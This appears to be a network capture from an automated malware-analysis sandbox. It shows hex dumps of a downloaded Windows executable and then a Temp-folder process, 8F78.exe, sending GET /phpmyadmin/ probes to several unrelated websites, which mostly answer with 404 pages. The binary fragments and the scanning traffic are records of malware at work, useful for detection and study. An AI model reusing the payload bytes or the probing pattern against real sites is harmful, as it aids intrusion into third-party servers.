                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC690INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 dc 82 59 63 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELYc
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 00 6a 00 ff 15 30 60 80 00 33 75 fc 89 75 f0 8b 45 f0 83 45 f4 64 29 45 f4 83 6d f4 64 8b 55 f4 c1 e2 04 89 55 fc 8b 45 e4 01 45 fc 8b 55 f4 8b 4d f8 8b f2 d3 ee 8d 04 17 31 45 fc 03 75 e0 81 3d 28 a2 c2 00 21 01 00 00 75 1a 6a 00 ff 15 38 60 80 00 68 40 7c 80 00 6a 00 6a 00 ff 15 70 60 80 00 8b 55 f4 8b 45 fc 33 c6 2b d8 81 c7 47 86 c8 61 83 6d ec 01 89 45 fc 0f 85 c6 fe ff ff 81 3d 28 a2 c2 00 6d 0a 00 00 8b 75 08 89 1e 75 19 6a 00 6a 00 ff 15 7c 60 80 00 8b 45 f4 5f 89 46 04 5e 5b 8b e5 5d c2 04 00 5f 89 56 04 5e 5b 8b e5 5d c2 04 00 55 8b ec a1 28 a2 c2 00 8b 0d 7c 91 c2 00 c1 e8 03 81 ec 1c 08 00 00 85 c0 0f 86 b1 00 00 00 53 8b 1d b0 60 80 00 56 8b 35 ac 60 80 00 57 8b 3d b4 60 80 00 89 4d fc 89 45 f8 8d 9b 00 00 00 00 81 3d 28 a2 c2 00 59 09 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: j0`3uuEEd)EmdUUEEUM1Eu=(!uj8`h@|jjp`UE3+GamE=(muujj|`E_F^[]_V^[]U(|S`V5`W=`ME=(Y
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 38 0b 00 00 8b ce e8 21 0b 00 00 6a 00 6a 00 8b ce e8 c6 0a 00 00 8b c6 c3 cc cc cc 6a 00 6a 01 e8 b7 0a 00 00 c3 cc cc cc cc cc cc 56 8b f1 8b 4e 38 c7 06 84 7d 80 00 85 c9 74 07 6a 01 e8 39 0a 00 00 8d 4e 04 5e e9 51 1a 00 00 e8 cb f7 ff ff c2 04 00 cc cc cc cc cc cc cc cc e8 bb f7 ff ff c2 04 00 cc cc cc cc cc cc cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc e9 9b f7 ff ff cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 8b f1 8b 06 8b 50 10 57 ff d2 89 45 fc e8 77 f7 ff ff 8b f8 8d 55 fc 8d 45 f8 89 7d f8 e8 57 f7 ff ff 84 c0 74 08 8b c7 5f 5e 8b e5 5d c3 8b ce e8 b4 0b 00 00 e8 2f f7 ff ff 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8b 01 8b 40 1c 52 8b 55 08 6a ff 52 ff d0 5d c2 08 00 cc cc cc cc cc cc cc cc 55 8b ec
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8!jjjjVN8}tj9N^Q3UVPWEwUE}Wt_^]/_^]UU@RUjR]U
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 06 00 00 8b 5d f4 f6 46 40 01 74 0d 8b 4d f0 53 51 8d 4e 44 e8 da 05 00 00 83 4e 40 01 8b ce e8 7f 07 00 00 8b f0 8d 45 08 e8 65 f2 ff ff 5f 88 06 8b 45 08 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 8b f1 57 8b c6 e8 4f 06 00 00 85 c0 0f 84 9b 00 00 00 8b c6 e8 40 06 00 00 8b f8 8b c6 e8 27 06 00 00 3b f8 0f 86 83 00 00 00 e8 4a f2 ff ff 8b f8 8d 55 08 8d 45 f8 89 7d f8 e8 2a f2 ff ff 84 c0 75 27 8d 45 08 e8 fe f1 ff ff 88 45 ff 8b c6 e8 04 06 00 00 8b d0 4a 8d 45 ff e8 a9 f1 ff ff 84 c0 75 06 f6 46 40 02 75 43 83 c9 ff 8b d6 e8 25 06 00 00 8d 55 08 8d 45 f8 89 7d f8 e8 e7 f1 ff ff 84 c0 75 13 8b c6 e8 cc 05 00 00 8b f0 8d 45 08 e8 b2 f1 ff ff 88 06 8d 45 08 50 e8 e7 f1 ff ff 83 c4 04 5f 5e 8b e5 5d c2 04 00 e8 c7 f1 ff ff 5f 5e 8b
                                                                                                                                                                                                                                                                                                                                Data Ascii: ]F@tMSQNDN@Ee_E^[]UVWO@';JUE}*u'EEJEuF@uC%UE}uEEP_^]_^
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: e8 a5 f8 ff ff f6 45 08 01 74 09 56 e8 94 15 00 00 83 c4 04 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 80 7d 08 00 53 8b 5d 0c 56 8b f1 74 28 83 7e 18 10 72 22 8d 46 04 57 8b 38 85 db 76 0a 53 57 6a 10 50 e8 46 07 00 00 8b 46 18 40 50 57 8b ce e8 39 00 00 00 5f 53 8b ce c7 46 18 0f 00 00 00 e8 49 03 00 00 5e 5b 5d c2 08 00 cc cc cc 8b c1 c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 e8 ff 14 00 00 83 c4 04 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 e8 35 07 00 00 5d c2 04 00 cc 55 8b ec 64 a1 00 00 00 00 6a ff 68 bb 59 80 00 50 64 89 25 00 00 00 00 56 57 8b 7d 08 8d 4f 04 c7 07 84 7d 80 00 e8 dc 0e 00 00 6a 04 c7 45 fc 00 00 00 00 e8
                                                                                                                                                                                                                                                                                                                                Data Ascii: EtV^]U}S]Vt(~r"FW8vSWjPFF@PW9_SFI^[]UEP]UM5]UdjhYPd%VW}O}jE
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 8b c3 e8 8a 00 00 00 8b f0 e8 63 02 00 00 8b f7 8b c3 e8 3a ff ff ff 5f 5e 8b c3 5b 5d c2 08 00 cc e8 db 00 00 00 3b c7 73 05 e8 1e 07 00 00 39 7b 18 73 14 8b 43 14 50 57 53 e8 e2 00 00 00 33 c9 3b cf 1b c0 f7 d8 c3 85 ff 75 0b 56 33 f6 8b c3 e8 fb fe ff ff 5e 33 c9 3b cf 1b c0 f7 d8 c3 cc 8b c6 e8 29 00 00 00 3d e0 7c 80 00 77 18 8b c6 e8 1b 00 00 00 8b 4e 14 8d 14 48 81 fa e0 7c 80 00 76 03 b0 01 c3 32 c0 c3 cc cc cc cc cc cc cc 83 78 18 08 72 04 8b 40 04 c3 83 c0 04 c3 cc cc 53 56 8b f1 8b d8 39 77 14 73 05 e8 e8 07 00 00 8b 47 14 2b c6 3b c3 73 02 8b d8 85 db 76 32 2b c3 50 8b c7 e8 c7 ff ff ff 8d 0c 1e 8d 14 48 8b 47 18 2b c6 52 50 8b c7 e8 b3 ff ff ff 8d 34 70 e8 fb 01 00 00 8b 77 14 2b f3 8b c7 e8 5f fe ff ff 5e 8b c7 5b c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                                Data Ascii: c:_^[];s9{sCPWS3;uV3^3;)=|wNH|v2xr@SV9wsG+;sv2+PHG+RP4pw+_^[
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 8b f9 89 7d e8 8b 75 08 83 ce 0f 83 fe fe 76 05 8b 75 08 eb 25 33 d2 6a 03 8b c6 5b f7 f3 8b 4f 18 89 4d ec d1 6d ec 8b 55 ec 3b c2 73 0c 6a fe 58 2b c2 3b c8 77 03 8d 34 0a 83 65 fc 00 8d 46 01 50 8b cf e8 bf f5 ff ff 8b d8 eb 29 8b 45 08 8b 4d e8 89 45 08 40 89 65 f0 50 c6 45 fc 02 e8 a4 f5 ff ff 89 45 ec b8 35 2f 40 00 c3 8b 7d e8 8b 75 08 8b 5d ec 83 7d 0c 00 76 1f 83 7f 18 10 72 05 8b 47 04 eb 03 8d 47 04 ff 75 0c 50 8d 46 01 50 53 e8 1e ff ff ff 83 c4 10 6a 00 6a 01 8b cf e8 d2 f4 ff ff ff 75 0c 8b cf 89 5f 04 89 77 18 e8 52 f8 ff ff e8 f0 13 00 00 c2 08 00 8b 4d e8 33 f6 56 6a 01 e8 ad f4 ff ff 56 56 e8 21 0f 00 00 cc 6a 04 b8 63 58 80 00 e8 63 13 00 00 8b f1 89 75 f0 e8 ad 08 00 00 ff 75 08 83 65 fc 00 8d 4e 0c c7 06 10 62 80 00 e8 82 03 00 00 8b
                                                                                                                                                                                                                                                                                                                                Data Ascii: }uvu%3j[OMmU;sjX+;w4eFP)EME@ePEE5/@}u]}vrGGuPFPSjju_wRM3VjVV!jcXcuueNb
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: 55 8b ec f6 45 08 01 56 8b f1 c7 06 5c 62 80 00 74 07 56 e8 82 05 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 8b 08 85 c9 74 11 e8 8c dd ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 5d c3 8b ff 55 8b ec 51 6a 00 8d 4d fc e8 3b f9 ff ff 68 e8 b3 80 00 e8 c5 ff ff ff 83 25 e8 b3 80 00 00 59 8d 4d fc e8 49 f9 ff ff c9 c3 a1 e8 b3 80 00 c3 8b ff 55 8b ec 80 3d 0c b4 80 00 00 75 12 68 62 34 40 00 c6 05 0c b4 80 00 01 e8 ec 01 00 00 59 8b 45 08 a3 e8 b3 80 00 5d c3 6a 04 b8 ef 58 80 00 e8 40 0e 00 00 6a 00 8d 4d f0 e8 d9 f8 ff ff 8b 7d 08 83 65 fc 00 8b 77 0c eb 1f 8b 47 08 4e 8d 04 b0 83 38 00 74 13 8b 08 e8 ed dc ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 85 f6 77 dd ff 77 08 e8 7c 0e 00 00 83 4d fc ff 59 8d 4d f0 e8 bd f8 ff ff e8 56 0e 00 00 c3 6a 04
                                                                                                                                                                                                                                                                                                                                Data Ascii: UEV\btVY^]UEttj]UQjM;h%YMIU=uhb4@YE]jX@jM}ewGN8ttjww|MYMVj
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC1369INData Raw: c6 5e 5d c2 04 00 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 ad 1e 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 5d e9 df ff ff ff 8b ff 55 8b ec 8b 45 08 66 8b 08 40 40 66 85 c9 75 f6 2b 45 08 d1 f8 48 5d c3 8b ff 55 8b ec 5d e9 c1 09 00 00 8b ff 55 8b ec 56 8b 75 14 57 33 ff 3b f7 75 04 33 c0 eb 65 39 7d 08 75 1b e8 10 1a 00 00 6a 16 5e 89 30 57 57 57 57 57 e8 99 19 00 00 83 c4 14 8b c6 eb 45 39 7d 10 74 16 39 75 0c 72 11 56 ff 75 10 ff 75 08 e8 60 1e 00 00 83 c4 0c eb c1 ff 75 0c 57 ff 75 08 e8 5f 10 00 00 83 c4 0c 39 7d 10 74 b6 39 75 0c 73 0e e8 c1 19 00 00 6a 22 59 89 08 8b f1 eb ad 6a 16 58 5f 5e 5d c3 8b ff 51 c7 01 94 62 80 00 e8 84 21 00 00 59 c3 8b ff 55 8b ec 56 8b f1 e8 e3 ff ff ff f6 45 08 01 74 07 56 e8 4f ff ff ff 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec
                                                                                                                                                                                                                                                                                                                                Data Ascii: ^]Ujju]U]UEf@@fu+EH]U]UVuW3;u3e9}uj^0WWWWWE9}t9urVuu`uWu_9}t9usj"YjX_^]Qb!YUVEtVOY^]U


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                2192.168.2.45044662.109.151.154435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-bicycles.eu
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 153
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC153INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                3192.168.2.45090423.239.22.2024435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC207INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                4192.168.2.450623216.230.253.854435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-art-studio.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 131
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC131INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 27 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 39 39 33 33 36 36 3b 27 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head></head><body><h1 style='text-align: center;'><span style='color: #993366;'>404 Page Not Found</span></h1></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                5192.168.2.45094362.109.151.154435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-bicycles.eu
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 153
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC153INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                6192.168.2.45031592.240.253.34435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:26 UTC320INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                link: <https://eurokamen.sk/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:26 UTC14158INData Raw: 33 37 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 2d 53 4b 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 74 72 c3 a1 6e 6b 61 20 6e 65 6e c3 a1 6a 64 65 6e c3 a1 20 26 23 38 32 31 31 3b 20 45 55 52 4f 20 4b 41 4d 45 c5 87 2c 20 73 2e 72 2e 6f 2e 3c
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3746<!DOCTYPE html><html lang="sk-SK"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Strnka nenjden &#8211; EURO KAME, s.r.o.<
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC16384INData Raw: 34 33 45 30 0d 0a 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 43E0ckground{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC1000INData Raw: 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 34 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 6a 73 2d 62 65 66 6f 72 65 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 63 6e 41 72 67 73 20 3d 20 7b 22 61 6a 61 78 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 6e 6f 6e 63 65 22 3a 22 34 37 31 61 66 63 35 63 37 65 22 2c 22 68 69 64 65 45 66 66 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: y-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script><script async type="text/javascript" id="cookie-notice-front-js-before">/* <![CDATA[ */var cnArgs = {"ajaxUrl":"https:\/\/eurokamen.sk\/wp-admin\/admin-ajax.php","nonce":"471afc5c7e","hideEffe
